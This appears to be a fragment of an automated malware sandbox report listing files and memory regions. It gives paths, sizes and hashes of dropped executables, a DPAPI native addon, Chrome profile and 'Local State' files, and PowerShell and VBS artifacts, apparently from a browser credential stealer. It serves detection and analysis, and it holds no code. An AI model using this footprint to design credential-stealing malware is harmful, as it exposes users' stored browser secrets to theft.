                                        • MD5 SHA1 SHA512 TLSH

                                        node.napi.node

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\prebuilds\win32-x64\node.napi.node
                                        • Size 137KB
                                        • SHA256 da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        dpapi_addon.h

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\src\dpapi_addon.h
                                        • Size 99B
                                        • SHA256 bf9639dd953de6f4ab47d68943f11f99907ff31ea4d05549150e89a21a6efb51
                                        • MD5 SHA1 SHA512 TLSH

                                        dpapi_not_supported.cpp

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\src\dpapi_not_supported.cpp
                                        • Size 218B
                                        • SHA256 0c1d1737d698c15cacdfe963b8a84cffad1422fc0be1fd6995f0572b70492a1c
                                        • MD5 SHA1 SHA512 TLSH

                                        dpapi_win.cpp

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\src\dpapi_win.cpp
                                        • Size 2KB
                                        • SHA256 0773f2d8790fc5bef82815942188f5c9a58d88581e0f2423944f629add5a8cb9
                                        • MD5 SHA1 SHA512 TLSH

                                        main.cpp

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\src\main.cpp
                                        • Size 589B
                                        • SHA256 b2b9ddbd143fe87f82e2f8cf6a8436ae20e5ebcd50a42773e1b2d49263dddd95
                                        • MD5 SHA1 SHA512 TLSH

                                        dpapi.spec.ts

                                        • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\test\dpapi.spec.ts
                                        • Size 1KB
                                        • SHA256 d033879616fc3261b8bd529b14c06b29739c81b681dec25723cecbbf7877f2cd
                                        • MD5 SHA1 SHA512 TLSH

                                        node_sqlite3.node

                                        • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
                                        • Size 1.8MB
                                        • SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        sqlite3-binding.js

                                        • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3-binding.js
                                        • Size 59B
                                        • SHA256 762c7a74d7f92860a3873487b68e89f654a21d2aaeae9524eab5de9c65e66a9c
                                        • MD5 SHA1 SHA512 TLSH

                                        sqlite3.js

                                        • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.js
                                        • Size 6KB
                                        • SHA256 8d6b400ae7f69a80d0cdd37a968d7b9a913661fa53475e5b8de49dda21684973
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        trace.js

                                        • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\trace.js
                                        • Size 1KB
                                        • SHA256 d06caec6136120c6fb7ee3681b1ca949e8b634e747ea8d3080c90f35aeb7728f
                                        • MD5 SHA1 SHA512 TLSH

                                        package.json

                                        • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\package.json
                                        • Size 2KB
                                        • SHA256 c782c19485b0026e209076a236484a62885cb3a0828322a2936043230ed1ec41
                                        • MD5 SHA1 SHA512 TLSH

                                        SCT Auditing Pending Reports

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                        • Size 2B
                                        • SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
                                        • MD5 SHA1 SHA512

                                        Preferences

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                        • Size 11KB
                                        • SHA256 9234610049b78b0c08109c68f4763b01ea08fdbf0fbbff17cad2308afa95f7f8
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        Secure Preferences

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                        • Size 11KB
                                        • SHA256 949732f322e081cbccf6217c812fc00a0b4537cd898984897d2d7390c80a70fe
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        CURRENT

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT
                                        • Size 16B
                                        • SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
                                        • MD5 SHA1 SHA512

                                        MANIFEST-000001

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001
                                        • Size 41B
                                        • SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
                                        • MD5 SHA1 SHA512

                                        Local State

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                        • Size 132KB
                                        • SHA256 c15d686fa9444ab82d6bc71a59e83ab42fdde7cb0b9b116e332a74e3b5b88a06
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        Local State

                                        • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                        • Size 130KB
                                        • SHA256 27c6e44b1c42567214754585a4f589704370b052d0f5f3e59c73beccc80a376b
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        cache.exe

                                        • Path C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\cache.exe
                                        • Size 1.8MB
                                        • SHA256 a3870c485b350542231baca4a670099560f00ff1c92580880ae12ffb5d5d92c5
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        dwm_overlay.exe

                                        • Path C:\Users\Admin\AppData\Local\MediaOverlay\yixz6b\dwm_overlay.exe
                                        • Size 43.2MB
                                        • SHA256 99b50278706d427ab686266534b28e7c4e9b596f3dca4dfa88ca51190402f79a
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        powershell.exe.log

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                        • Size 2KB
                                        • SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 773770780aa72ab09f5978b4344955ec22ba01961f8d58bdb6b8c0ab6540b2c1
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 69ac948c756f3abf68ea39517936acd604db081fa409c1f219d9e0bc398cf45a
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 99d8d25fbbac87aa9d6d64b5bcd55f655a6cb6f2b0624030456a940cd59f6d72
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 c29ce0eeebbf1e6e7f60dfae7a880cf12ff690468901bf2820f9e1e16e799e66
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 fd949ff64bc93b6bcff447de4f7307dbd4cfb391faf81efe2a845f8349d9b10c
                                        • MD5 SHA1 SHA512 TLSH

                                        StartupProfileData-NonInteractive

                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        • Size 1KB
                                        • SHA256 6549456695c046fb7780092238b5dd986bb686e6626770f998107607d8a16f91
                                        • MD5 SHA1 SHA512 TLSH

                                        svc_model.exe.bx

                                        • Path C:\Users\Admin\AppData\Local\PickerHost\gos4fm\svc_model.exe.bx
                                        • Size 17.8MB
                                        • SHA256 b4bac4b364f8703753b5d296900759cb755e71850342cea3fdb71c1ced2dcc4d
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        RESB67A.tmp

                                        • Path C:\Users\Admin\AppData\Local\Temp\RESB67A.tmp
                                        • Size 1KB
                                        • SHA256 f3f8b6436d4e631fcf10dfc32c5adc59a3322caf1ccd792775465cd38be25796
                                        • MD5 SHA1 SHA512 TLSH

                                        __PSScriptPolicyTest_g4kr11dt.zst.ps1

                                        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4kr11dt.zst.ps1
                                        • Size 60B
                                        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                        • MD5 SHA1 SHA512 TLSH

                                        m50ycfjz.dll

                                        • Path C:\Users\Admin\AppData\Local\Temp\m50ycfjz\m50ycfjz.dll
                                        • Size 3KB
                                        • SHA256 08b4cbc549f996af0c1183ba319505e052a029b1e20f54ef905143acaad07aaa
                                        • MD5 SHA1 SHA512 TLSH

                                        msync.dat

                                        • Path C:\Users\Admin\AppData\Local\Temp\msync.dat
                                        • Size 33B
                                        • SHA256 70d619c4b5e74df95bbaa24833e40dc4d1cbdd2ec564bedff94a5277c7fcc341
                                        • MD5 SHA1 SHA512

                                        wudejp7u.vbs

                                        • Path C:\Users\Admin\AppData\Local\Temp\wudejp7u.vbs
                                        • Size 150B
                                        • SHA256 3c21919c16d8b17e2bb751dcd956fa68c2851acae187a2045c4fee414944e467
                                        • MD5 SHA1 SHA512 TLSH

                                        CSC73E5B2C824D141C68AF0408AB8E8B846.TMP

                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\m50ycfjz\CSC73E5B2C824D141C68AF0408AB8E8B846.TMP
                                        • Size 652B
                                        • SHA256 42d3433c9412f9236e5f39dc17197cefe425c162cc3c170f5bf90ac511820950
                                        • MD5 SHA1 SHA512 TLSH

                                        m50ycfjz.0.cs

                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\m50ycfjz\m50ycfjz.0.cs
                                        • Size 312B
                                        • SHA256 a5c3410c34e03d37491bd44c462beb054179cb6b34c53649fed031c59c2e4123
                                        • MD5 SHA1 SHA512 TLSH

                                        m50ycfjz.cmdline

                                        • Path \??\c:\Users\Admin\AppData\Local\Temp\m50ycfjz\m50ycfjz.cmdline
                                        • Size 369B
                                        • SHA256 2369e2ef1e6cd90e7899c8d99cc72f4e1eb4056ee554a1e8584797b67320ad6d
                                        • MD5 SHA1 SHA512 TLSH

                                        memory/1636-19-0x00000258359A0000-0x00000258359C2000-memory.dmp

                                        memory/1636-38-0x0000025819DA0000-0x0000025819DA8000-memory.dmp

                                        memory/2384-69-0x000001EF9A530000-0x000001EF9A538000-memory.dmp

                                        memory/2384-64-0x000001EF9A370000-0x000001EF9A423000-memory.dmp

                                        memory/2384-63-0x000001EF9A350000-0x000001EF9A36C000-memory.dmp

                                        memory/2384-65-0x000001EFFCAC0000-0x000001EFFCACA000-memory.dmp

                                        memory/2384-66-0x000001EFFE6A0000-0x000001EFFE6BC000-memory.dmp

                                        memory/2384-67-0x000001EFFE5C0000-0x000001EFFE5CA000-memory.dmp

                                        memory/2384-68-0x000001EFFE6C0000-0x000001EFFE6DA000-memory.dmp

                                        memory/2384-70-0x000001EF9A8A0000-0x000001EF9A8A6000-memory.dmp

                                        memory/2384-71-0x000001EFFE5D0000-0x000001EFFE5DA000-memory.dmp

                                        memory/3052-176-0x0000029D7F300000-0x0000029D7F350000-memory.dmp

                                        memory/5976-183-0x0000024BB5C40000-0x0000024BB5CF3000-memory.dmp